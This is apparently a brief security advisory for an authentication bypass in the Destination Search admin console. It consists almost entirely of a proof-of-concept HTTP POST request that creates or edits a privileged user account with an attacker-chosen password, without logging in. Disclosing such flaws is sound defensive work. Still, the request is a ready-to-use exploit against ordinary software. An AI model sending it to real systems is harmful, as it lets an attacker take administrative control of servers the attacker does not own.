|
|
Destination Search Admin Console Security Bypass Vulnerability
The following proof of concept is available: POST /selfserve/ss/user/edit HTTP/1.0 Host: ds.example.com Content-Type: application/x-www-form-urlencoded Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Content-Length: 91 userId=&name=malicious&_status=on&password=malicious123&roleId=0&editListing=all&con dition=all |
|
Privacy Statement |